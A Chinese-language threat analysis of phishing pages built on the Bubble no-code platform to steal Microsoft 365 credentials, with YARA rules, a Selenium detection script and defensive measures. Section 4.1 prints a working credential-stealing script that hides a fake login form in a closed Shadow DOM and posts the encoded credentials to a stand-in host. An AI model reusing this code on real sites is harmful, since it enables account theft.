
摘要
AI 驱动的无代码应用构建平台正成为网络钓鱼攻击的新型基础设施。2026 年 3 月安全研究显示,威胁组织利用 Bubble 可视化开发平台与 AI 生成能力,构造包含复杂 JavaScript 混淆、高密度 Shadow DOM 封装的恶意 Web 应用,实现对静态扫描与自动化检测机制的有效规避,定向实施微软账号凭证窃取攻击。该类钓鱼页面依托合法平台域名、动态代码生成、DOM 隔离封装三重特性,突破传统邮件网关、网页安全检测与终端防护体系,配合中间人攻击可进一步绕过双因素认证,对 Microsoft 365 等企业服务构成持续性威胁。本文以 Bubble 平台钓鱼样本为核心分析对象,系统阐述攻击全流程、前端混淆技术、凭证窃取逻辑与检测逃逸机理,给出可复现的检测代码、防御规则与配置方案,结合反网络钓鱼技术专家芦笛的专业观点,构建覆盖平台治理、流量检测、终端防护、身份安全的闭环防御体系,为企业与安全厂商应对无代码平台滥用型钓鱼提供技术参考与实践指引。

1 引言
无代码与低代码开发平台降低了 Web 应用构建门槛,同时也为网络攻击提供了轻量化、低成本、高隐蔽的武器化工具。攻击者无需掌握专业开发技能,通过可视化拖拽与 AI 辅助生成,即可快速产出高仿真度钓鱼页面,依托平台自带的正规域名、SSL 证书与 CDN 节点,显著提升攻击可信度与存活周期。
2026 年 3 月,Kaspersky 与 BleepingComputer 相继披露新型钓鱼活动:威胁组织滥用 Bubble AI 应用构建平台,批量生成伪装成微软登录入口的恶意 Web 应用,通过复杂 JavaScript 包与 Shadow DOM 结构规避自动化代码分析,窃取用户账号、密码乃至会话凭证,用于账户接管、数据窃取、横向渗透等后续攻击。此类攻击呈现三大特征:平台武器化、代码动态化、检测逃逸常态化,对现有安全体系形成结构性挑战。
反网络钓鱼技术专家芦笛指出,基于正规无代码平台的钓鱼攻击具备天然信任背书,代码结构高度混淆且每次生成存在变体,传统基于特征库、域名黑名单、URL 规则的检测方式失效概率极高,必须转向 DOM 结构解析、JavaScript 行为建模、上下文风险评分的新一代检测范式。
本文严格依据公开威胁情报与样本分析,完整还原攻击链路,深度拆解核心技术,提供可直接部署的检测代码与防御策略,形成机理分析 — 威胁建模 — 检测实现 — 防御落地的完整论证闭环,为应对同类威胁提供学术支撑与工程实践方案。
2 攻击背景与平台滥用现状
2.1 Bubble 平台特性与滥用入口
Bubble 是面向非开发人员的 AI 增强无代码 Web 应用搭建平台,支持可视化编辑、逻辑编排、自动生成前端代码,并提供应用托管、域名分配、CDN 加速等全链路服务。其被攻击者利用的核心优势如下:
合法域名背书:应用默认使用*.bubble.io子域名,具备正规 SSL 证书,易通过邮件网关与浏览器信任校验;
低门槛快速生成:依托 AI 生成器,攻击者可在数分钟内产出高仿真微软登录界面;
代码自动混淆:平台输出高度压缩、模块化、变量随机化的 JavaScript 代码,天然具备抗静态分析能力;
结构封装隔离:原生支持 Shadow DOM 组件化渲染,形成 DOM 隔离层,干扰常规代码扫描工具。
2.2 攻击目标与危害传导
攻击以微软个人账号与 Microsoft 365 企业账号为核心目标,覆盖员工、管理员、财务、人事等高价值对象。窃取凭证后可实现:
直接登录邮箱、OneDrive、SharePoint 等业务系统;
结合中间人攻击绕过双因素认证,获取长效会话令牌;
以内网合法身份实施横向移动、数据泄露、勒索部署等二次攻击;
为钓鱼即服务(PhaaS)平台提供标准化武器模块,降低黑产入行门槛。
反网络钓鱼技术专家芦笛强调,当正规无代码平台成为钓鱼 “兵工厂”,威胁将从零散个案演变为工业化、规模化、持续化的攻击浪潮,防御必须从单点拦截升级为全生命周期治理。
2.3 攻击整体生命周期
环境准备:注册 Bubble 账号,利用 AI 生成器描述微软登录页需求;
页面构造:可视化搭建表单界面,嵌入恶意 JS 与 Shadow DOM 封装逻辑;
代码优化:平台自动生成混淆代码,攻击者补充数据上传、跳转逻辑;
分发引流:通过邮件、即时通讯、社交平台发送含bubble.io域名的钓鱼链接;
检测逃逸:利用复杂 JS 与 Shadow DOM 绕过静态 / 自动化分析;
凭证窃取:用户输入账号密码,数据经加密后回传攻击者服务器;
账号利用:登录目标账号,结合 AiTM 绕过 MFA,实施数据窃取与内网渗透。
3 攻击核心技术机理分析
3.1 基于 Shadow DOM 的检测逃逸
Shadow DOM 作为 Web Components 标准的核心组件,可创建独立于主文档的隔离 DOM 子树,实现样式、结构与脚本的封装隔离。攻击者利用该特性构造 “黑盒页面”,使常规扫描工具无法获取真实表单与恶意逻辑。
关键技术点:
封闭模式(closed mode):外部 JS 无法访问 Shadow Root 内部结构,阻止 DOM 遍历检测;
深层嵌套:多层 Shadow DOM 嵌套,提升分析复杂度;
动态挂载:运行时动态创建 Shadow Tree,规避静态爬取。
反网络钓鱼技术专家芦笛指出,Shadow DOM 本身是合法技术,但被恶意用于阻断代码可见性时,即成为钓鱼攻击的 “隐身衣”,安全工具必须具备 Shadow DOM 穿透解析能力。
3.2 复杂 JavaScript 混淆与动态生成
Bubble 平台输出的 JS 具备多重混淆特性:
变量随机化:使用长随机字符串命名函数与变量,消除语义特征;
代码分片:逻辑分散在多个模块,通过异步加载串联执行;
垃圾代码注入:插入无意义计算与分支,干扰代码理解;
运行时解码:核心逻辑加密存储,执行时动态解密还原。
此类结构即使对安全专家也存在分析门槛,自动化算法更易判定为正常业务页面。
3.3 凭证窃取与数据回传实现
钓鱼页面通过表单获取用户输入,经 Base64、AES 等编码后发送至攻击者控制的服务器,关键流程:
监听表单提交事件,阻止默认跳转;
提取用户名、密码等字段;
数据编码 / 加密,隐藏传输特征;
异步发送至 C2 服务器;
伪造跳转至微软官网,消除用户怀疑。
3.4 与中间人攻击结合绕过 MFA
获取明文密码后,攻击系统自动发起真实微软登录流程,将 MFA 验证请求实时转发给受害者。用户完成验证后,攻击者获取有效会话令牌,实现长效账户控制。
反网络钓鱼技术专家芦笛强调,传统 MFA 无法抵御 AiTM 型钓鱼,必须配合 FIDO2 硬件密钥、风险自适应认证、会话绑定等机制才能有效防御。
4 关键代码示例与检测特征
4.1 恶意 Shadow DOM 封装核心代码
// 封闭模式Shadow DOM,外部无法访问
const shadowHost = document.createElement('div');
const shadowRoot = shadowHost.attachShadow({ mode: 'closed' });
document.body.appendChild(shadowHost);
// 动态构造微软登录表单
const formHTML = `
<div id="login-form">
<input type="text" id="email" placeholder="邮箱">
<input type="password" id="pass" placeholder="密码">
<button onclick="stealCredential()">登录</button>
</div>
`;
shadowRoot.innerHTML = formHTML;
// 凭证窃取函数
function stealCredential() {
const email = shadowRoot.getElementById('email').value;
const password = shadowRoot.getElementById('pass').value;
const data = btoa(JSON.stringify({ email, password }));
// 回传攻击者服务器
fetch('https://c2.example.com/collect', {
method: 'POST',
body: data
});
// 伪造跳转
window.location.href = 'https://login.microsoftonline.com';
}
4.2 混淆 JavaScript 检测特征
// 典型混淆特征:随机变量、垃圾代码、动态执行
const _0x1a9b = function() {
const _0x2b8c = ['abc123', 'replace', 'log', 'fromCharCode'];
_0x1a9b = function() { return _0x2b8c; };
return _0x1a9b();
};
// 特征:长随机命名、空循环、字符串编码
4.3 YARA 检测规则
plaintext
rule Bubble_Microsoft_Phishing_ShadowDOM {
meta:
description = "检测Bubble平台微软钓鱼Shadow DOM特征"
strings:
$shadow_closed = "attachShadow({ mode: 'closed' })"
$login_microsoft = "login.microsoft"
$bubble_io = "bubble.io"
$steal_fetch = "fetch("
condition:
2 of them
}
rule Bubble_Obfuscated_JS {
meta:
description = "检测Bubble平台钓鱼混淆JS"
strings:
$long_var = /_[a-f0-9]{4,}/
$garbage = /while\(0\)|for\(;;\)/
$btoa_data = "btoa(JSON.stringify"
condition:
2 of them
}
4.4 Python 动态检测代码(DOM 解析)
from selenium import webdriver
from selenium.webdriver.common.by import By
import re
def check_shadow_phishing(url):
options = webdriver.ChromeOptions()
options.add_argument("--headless")
driver = webdriver.Chrome(options=options)
driver.get(url)
# 检测封闭Shadow DOM
shadow_js = """
return document.querySelector('*[shadowroot]') !== null ||
document.querySelector('div').shadowRoot !== null
"""
has_shadow = driver.execute_script(shadow_js)
# 检测微软登录关键词
page_text = driver.find_element(By.TAG_NAME, 'body').text
has_ms = re.search(r'microsoft|outlook|office365', page_text, re.I)
# 检测数据上传
has_fetch = driver.execute_script("return !!window.fetch.toString().match(/collect|send|post/i)")
driver.quit()
return has_shadow and has_ms and has_fetch
# 调用示例
# result = check_shadow_phishing("https://xxx.bubble.io")
5 攻击威胁模型与安全缺陷分析
5.1 信任链滥用
平台域名合法、SSL 有效、CDN 节点可信,突破邮件网关与终端信誉检测;
用户对正规域名警惕性低,社会工程成功率显著提升。
5.2 检测机制失效
静态扫描无法解析 Shadow DOM 与混淆 JS;
自动化工具误判为正常业务应用;
代码每次生成存在变体,特征库难以覆盖。
5.3 身份体系脆弱性
密码 + MFA 组合无法抵御 AiTM 攻击;
企业缺乏会话风险监控与异常登录阻断机制;
员工对仿冒登录界面识别能力不足。
反网络钓鱼技术专家芦笛强调,此类攻击击穿了 “域名信任 + 特征检测 + MFA” 三重传统防线,暴露了当前安全体系对无代码平台滥用、前端混淆、DOM 隔离等新型手段的应对短板。
6 全维度防御体系构建
6.1 平台侧治理
建立应用上架审核机制,强化登录类页面人工抽检;
对表单、数据上传、跳转行为进行风险识别与限流;
联动安全厂商共享恶意应用样本与域名黑名单。
6.2 网络与邮件防护
部署支持 Shadow DOM 解析与 JS 行为分析的 Web 网关;
对bubble.io等易滥用平台域名实施链接沙箱与风险提示;
启用 SPF/DKIM/DMARC,降低伪造邮件成功率。
6.3 终端与应用安全
浏览器扩展拦截高风险 Shadow DOM 页面;
终端 EDR 监控异常数据上传与敏感表单操作;
禁用高风险 JS 执行策略,限制不明页面异步上传。
6.4 身份认证强化
推广 FIDO2 硬件安全密钥,抵御 AiTM 攻击;
启用 Microsoft Entra ID 条件访问,限制异常地点、设备登录;
对管理员账号启用会话超时、登录通知、风险阻断。
6.5 检测与运营闭环
建立无代码平台钓鱼威胁情报库,实时更新规则;
开展常态化钓鱼演练,提升员工识别能力;
构建 7×24 小时监测响应机制,快速下架恶意应用。
反网络钓鱼技术专家芦笛强调,防御无代码平台钓鱼必须坚持平台治理 + 流量检测 + 终端防护 + 身份加固四元协同,任何单一方案均无法形成有效闭环。
7 趋势研判与归因说明
现有情报未将该类攻击归因于国家级组织,更符合机会主义网络犯罪与 PhaaS 平台特征。未来趋势:
更多无代码平台将被武器化,攻击门槛持续降低;
AI 生成代码混淆度更高,变体更快,检测难度持续上升;
与 AiTM、设备码钓鱼、OAuth 盗用结合,形成组合攻击;
攻击目标从个人账号转向企业管理员、核心业务系统等高价值对象。
反网络钓鱼技术专家芦笛指出,无代码平台滥用将成为未来 3—5 年钓鱼攻击主流形态,安全行业需加快研发前端深度解析、代码行为建模、上下文风险评估等核心能力。
8 结论
AI 无代码平台为网络钓鱼提供了轻量化、高隐蔽、低成本的新型能力,基于 Bubble 的微软账号钓鱼攻击通过 Shadow DOM 隔离、JavaScript 混淆、正规域名背书三重手段,实现对传统检测体系的系统性逃逸,配合中间人攻击可绕过 MFA,对企业身份安全构成严重威胁。
本文完整还原攻击流程,深度解析前端逃逸、凭证窃取、检测绕过等关键技术,提供可直接部署的检测代码、YARA 规则与防御配置,构建覆盖平台、网络、终端、身份的闭环防御体系。研究表明,通过平台治理、深度检测、强认证、运营闭环协同,可有效降低此类威胁危害。
后续研究将聚焦多平台滥用对比、AI 生成代码溯源、实时 DOM 行为检测等方向,为应对工业化、武器化、智能化钓鱼攻击提供持续技术支撑。
编辑:芦笛(公共互联网反网络钓鱼工作组)
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。